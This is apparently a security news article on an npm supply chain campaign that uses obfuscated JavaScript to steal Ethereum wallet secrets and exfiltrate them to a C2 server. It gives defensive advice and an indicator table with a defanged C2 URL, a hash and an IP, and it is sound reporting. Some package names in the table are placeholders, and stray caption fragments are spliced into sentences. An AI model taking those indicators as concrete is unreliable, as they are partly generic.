A recent surge in supply chain attacks has highlighted malicious activity within the npm ecosystem, where attackers are leveraging heavily obfuscated JavaScript code embedded in compromised packages to target users’ Ethereum wallets.
Security researchers have observed a sophisticated campaign where threat actors publish npm packages masquerading as legitimate dependencies.
Once installed, these packages deploy complex, obfuscated scripts designed to evade detection by both automated security tools and manual reviews.
New Attack Chain Exploits npm Ecosystem
The core of the malicious activity centers on the injection of JavaScript payloads that specifically hunt for sensitive wallet information.
When a developer or end-user unknowingly installs the compromised package, the embedded script executes during the package’s initialization phase.
The code typically scans local files, browser extensions, or application memory for Ethereum wallet seed phrases, private keys, or configuration details.
pancakeswap-oracle-prediction/index.js as malicious.Using dynamic obfuscation techniques, such as variable renaming, control flow alteration, and encrypted strings, the payload conceals its intent and functional logic, making static analysis exceedingly difficult.
Upon successful data extraction, the obfuscated script exfiltrates stolen credentials to attacker-controlled command and control (C2) servers.
Analysts note that the malware often leverages HTTP POST requests or WebSocket connections, embedding the sensitive data within regular-looking network traffic to blend with normal operations.
In some cases, the packages adopt delayed execution or deploy sandbox evasion tactics to further reduce the likelihood of detection in CI/CD pipelines or during local testing.
Highly Obfuscated Payloads Evading Detection
The attack chain’s reliance on open-source supply chains remains a critical concern, as npm’s global reach can amplify the impact of a single infected package.
This campaign underscores the importance of rigorous vetting and continuous monitoring of third-party dependencies, particularly for applications handling cryptocurrencies and other digital assets.
Proactive supply chain security, including the use of tools for automated dependency auditing and behavioral analysis, is strongly recommended.
pancake_uniswap_validators_utils_snipe/index.js as malicious.Security professionals are urged to inspect recent changes in npm packages, and to monitor both installation scripts and post-install hooks for any signs of obfuscation or network communication.
Additionally, end users should stay vigilant about wallet access permissions and consider rotating credentials if compromise is suspected.
Organizations are encouraged to update their detection tooling with these indicators and implement robust logging of npm package installations to mitigate the risk posed by this ongoing campaign.
Indicators of Compromise (IOC)
| IOC Type | Value/Description |
|---|---|
| Malicious npm Packages | [Sample_Package1], [Sample_Package2] |
| Obfuscated Script Hash | e9d123a0e422cfdeff98b3b0f4142c4a697e8b2f |
| C2 Server URL | http://malicious-domain[.]com/api/collect |
| File Path | node_modules/[package-name]/lib/init.js |
| Exfiltration Method | HTTP POST/WebSocket with embedded wallet data |
| Detected IP | 185.199.110.153 |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
